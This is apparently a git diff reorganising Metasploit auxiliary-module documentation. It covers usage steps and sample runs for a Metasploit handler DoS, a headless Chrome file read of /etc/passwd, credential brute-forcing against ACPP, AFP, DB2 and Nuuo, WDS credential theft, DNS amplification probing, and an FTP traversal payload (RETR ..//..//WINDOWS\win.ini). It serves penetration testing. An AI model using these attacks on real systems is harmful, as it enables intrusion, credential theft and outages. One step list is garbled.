@@ -15,7 +15,7 @@ IBM Notes 8.5 release

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 

-## Verification
+## Verification Steps

 Start msfconsole

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432

 ```

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/dos/http/webkitplus
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module exploits three vulnerabilities in Advantech WebAccess.

@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".

-
-## Vulnerable Application
-
 Version 8.1 was tested during development:

 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.

-
-## Demo
+## Scenarios

 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)
@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H

 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/gather/browser_lanipleak
@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.

 ## Verification Steps

@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api
@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.
@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.

-## Scenario
+## Scenarios

 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Session Bruteforce

@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa

 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)

 - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Authenticated Arbitrary File Download

@@ -26,8 +26,6 @@ This module works in the following way:

 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)

 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.

 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not

 This script is maintaing the ability to run independently of MSF.

-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.

 ## Verification Steps

@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.


 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.

@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.

+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`

 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```

-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`

 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
@@ -0,0 +1,28 @@
+## Vulnerable Application
+
+ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/acpp/login)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/acpp/login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Apple AirPort Extreme 802.11g
+
+  ```
+  msf > use auxiliary/scanner/acpp/login
+  msf auxiliary(scanner/acpp/login) > show options
+  msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1
+      RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword
+      PASSWORD => myPassword
+  msf auxiliary(scanner/acpp/login) > run
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword
+  ```
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS. This module attempts to brute force authentication credentials for AFP.
+
+References:
+
+* [AFP_Reference](https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html)
+* [AFP_Security](https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html)
+
+### Kali 2019.3 Install Instructions
+
+1. `sudo apt-get install netatalk`
+2. edit `/etc/default/netatalk` and add the following lines:
+
+    ```
+    ATALKD_RUN=no
+    PAPD_RUN=no
+    CNID_METAD_RUN=yes
+    AFPD_RUN=yes
+    TIMELORD_RUN=no
+    A2BOOT_RUN=no
+    ```
+
+3. Restart the service: `sudo /etc/init.d/netatalk restart`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/afp/afp_login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Kali Linux 2019.3 and Netatalk 3.1.12
+
+  ```
+  msf > use modules/auxiliary/scanner/afp/afp_login
+  msf auxiliary(scanner/afp/afp_login) > set USERNAME tuser
+  msf auxiliary(scanner/afp/afp_login) > set PASSWORD myPassword
+  msf auxiliary(scanner/afp/afp_login) > set RHOST 172.17.0.2
+  msf auxiliary(scanner/afp/afp_login) > run
+    [*] 172.17.0.2:548 - Scanning IP: 172.17.0.2
+    [*] 172.17.0.2:548 - Login Successful: tuser:myPassword
+  ```
@@ -3,10 +3,11 @@
 Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS.  This module will gather information about the service.
 Netatalk is a Linux implementation of AFP.

-The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
-  
+The following was done on Ubuntu 16.04, and is largely based on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
+
  1. `sudo apt-get install netatalk`
  2. edit `/etc/default/netatalk` and add the following lines:
+
    ```
    ATALKD_RUN=no
    PAPD_RUN=no
@@ -15,6 +16,7 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
    TIMELORD_RUN=no
    A2BOOT_RUN=no
    ```
+
  3. Restart the service: `sudo /etc/init.d/netatalk restart`

 ## Verification Steps
@@ -22,40 +24,41 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
  1. Install and configure afp (or netatalk in a Linux environment)
  2. Start msfconsole
  3. Do: `auxiliary/scanner/afp/afp_server_info`
-  4. Do: `run`
+  4. Do: `set RHOSTS [ip]`
+  5. Do: `run`

 ## Scenarios

-  A run against the configuration from these docs
+### Ubuntu 16.04 with Netatalk 2.2.5

  ```
-  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info 
+  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info
  msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  msf5 auxiliary(scanner/afp/afp_server_info) > run
-  
+
  [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning...
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP:
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  UAMs: Cleartxt Passwrd, DHX2
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Signature: 975394e16633312406281959287fcbd9
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548   UTF8 Server Name: ubuntu
  [*] 1.1.1.1:548 - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_auth)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_auth`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+    ```
+    msf > use auxiliary/scanner/db2/db2_auth
+    msf auxiliary/scanner/db2/db2_auth) > show options
+    msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1
+    msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass
+    msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb
+    msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2
+    msf auxiliary/scanner/db2/db2_auth) > run
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: )
+      [*] 172.17.0.2:50000      - Login Successful: db2inst1:db2pass
+      [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+      [*] Auxiliary module execution completed
+    ```
@@ -0,0 +1,27 @@
+## Vulnerable Application
+
+This module queries a DB2 instance information.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_version)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_version`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+  ```
+  msf > use auxiliary/scanner/db2/db2_version
+  msf auxiliary(scanner/db2/db2_version) > show options
+  msf auxiliary(scanner/db2/db2_version) > set DATABASE testdb
+  msf auxiliary(scanner/db2/db2_version) > set RHOSTS 172.17.0.2
+  msf auxiliary(scanner/db2/db2_version) > run
+    [+] 172.17.0.2:50000      - 172.17.0.2:50000 DB2 - Platform: QDB2/LINUXX8664, Version: SQL11050, Instance: db2inst1, Plain-Authentication: OK
+    [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -1,5 +1,5 @@

-## About
+## Description

 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`

-
 ## Scenarios
- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run
@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/dcerpc/windows_deployment_services) and pull request [PR #1420](https://github.com/rapid7/metasploit-framework/pull/1420).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dcerpc/windows_deployment_services`
+  3. set RHOST [ip]
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Windows Server 2008 R2 X64
+
+  ```
+  msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > run
+
+    [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
+    [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
+    [*] Sending X64 Client Unattend request ...
+    [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
+    [+] Retrieved wds credentials for X64
+    [*] Sending X86 Client Unattend request ...
+    [*] Sending IA64 Client Unattend request ...
+
+      Windows Deployment Services
+      ===========================
+
+      Architecture  Type  Domain        Username  Password
+      ------------  ----  ------        --------  --------
+      X64           wds   Fabrikam.com  username  my_password
+
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+Detect UDP services that reply to empty probes.
+
+More information can be found on the [Rapid7 blog page](https://blog.rapid7.com/2014/10/03/adventures-in-empty-udp-scanning/)
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/discovery/empty_udp`
+3. Do: `set RHOSTS [ip]`
+4. Do: `set RPORT [port]`
+5. Do: `run`
+
+## Scenarios
+
+### A run against Windows XP (X64) using Kali Linux 2019.3
+
+  ```
+  msf auxiliary(scanner/dns/dns_amp) > use auxiliary/scanner/discovery/empty_udp
+  msf auxiliary(scanner/discovery/empty_udp) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/discovery/empty_udp) > set RPORT 135
+    RPORT => 135
+  msf auxiliary(scanner/discovery/empty_udp) > run
+    [*] Sending 1032 empty probes to 1.1.1.1->1.1.1.1 (1 hosts)
+    [+] Received #52 from #:135:#1095/udp
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,26 @@
+## Vulnerable Application
+
+This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/dlsw/dlsw_leak_capture`
+3. Do: `set RHOSTS [ip]`
+4. Do: `run`
+
+## Scenarios
+
+### IOS version 12.4(8) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
+    RHOSTS => 192.168.0.1
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
+    [*] 192.168.0.1:2067      - Checking for DLSw information disclosure (CVE-2014-7992)
+    [+] 192.168.0.1:2067      - Vulnerable to DLSw information disclosure; leaked 72 bytes
+    [*] 192.168.0.1:2067      - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
+    [*] 192.168.0.1:2067      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.
+
+BIND 9.4.1-P1: [source](ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz)
+Ubuntu 7.10: [Gutsy Gibbon](http://old-releases.ubuntu.com/releases/7.10/)
+
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dns/dns_amp`
+  3. Do: `set DOMAINNAME [domain]`
+  4. Do: `set RHOST [ip]`
+  5. Do: `run`
+
+## Scenarios
+
+### A run on Ubuntu 7.10 (Gutsy Gibbon) and BIND 9.4.1-P1
+
+  ```
+  msf > use modules/auxiliary/scanner/dns/dns_amp
+  msf auxiliary(scanner/dns/dns_amp) > set DOMAINNAME domain.com
+    DOMAINNAME => domain.com
+  msf auxiliary(scanner/dns/dns_amp) > set RHOSTS 192.168.10.254
+    RHOSTS => 192.168.10.254
+  msf auxiliary(scanner/dns/dns_amp) > run
+    [*] Sending DNS probes to 192.168.10.254->192.168.10.254 (1 hosts)
+    [*] Sending 70 bytes to each host using the IN ANY domain.com request
+    [+] 192.168.10.254:53 - Response is 374 bytes [5.34x Amplification]
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.

 By default, anonymous access is allowed by the FTP server.

-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:

@@ -22,6 +22,6 @@ The FTP server IP address.

 The file you wish to download. Assume this path starts from C:\

-## Demonstration
+## Scenarios

 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)
@@ -0,0 +1,29 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`.
+
+Link to Konica Minolta FTP Utility 1.00 software download [Exploit-DB](https://www.exploit-db.com/apps/6388a2ae7dd2965225b3c8fad62f2b3b-ftpu_10.zip)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/konica_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Konica Minolta FTP Utility 1.00 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/konica_ftp_traversal
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  set PATH ../../WINDOWS/win.ini
+    PATH => ../../WINDOWS/win.ini
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > run
+  [+] 1.1.1.1:21      - Stored ../../WINDOWS/win.ini to /root/.msf4/loot/20191122042114_default_1.1.1.1_konica.ftp.data_003802.ini
+  [*] 1.1.1.1:21      - Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`
+
+Linked to software download [Exploit-DB](https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/pcman_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### PCMan FTP Server 2.0.7 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > show options
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set RHOST 1.1.1.1
+    rhost => 1.1.1.1
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set PATH WINDOWS\\win.ini
+    PATH => WINDOWS\win.ini
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > run    
+    [+] 192.168.2.252:21      - Stored WINDOWS\win.ini to /root/.msf4/loot/20191120201523_default_1.1.1.1_pcman.ftp.data_069450.ini
+    [*] 192.168.2.252:21      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+### Manual Exploitation
+
+  ```
+  2019/11/20 [12:46] (00588) 1.1.1.2> User connecting from 1.1.1.2
+
+  2019/11/20 [12:46] (00588) 1.1.1.2> USER anonymous
+  2019/11/20 [12:46] (00588) Anonymous> 331 User name okay, need password.
+
+  2019/11/20 [12:46] (00588) Anonymous> PASS *****
+  2019/11/20 [12:46] (00588) Anonymous> 230 User logged in
+
+  2019/11/20 [12:46] (00588) Anonymous> PASV
+  2019/11/20 [12:46] (00588) Anonymous> 227 Entering Passive Mode (1.1.1.1,8,1)
+
+  2019/11/20 [12:46] (00588) Anonymous> RETR ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//WINDOWS\win.ini
+  2019/11/20 [12:46] (00588) Anonymous> 150 File status okay; Open data connection.
+
+  2019/11/20 [12:46] (00588) Anonymous> 226 Data Sent okay.
+
+  2019/11/20 [12:46] (00588) Anonymous> User Disconnected.
+  ```
@@ -1,9 +1,7 @@
-## Description
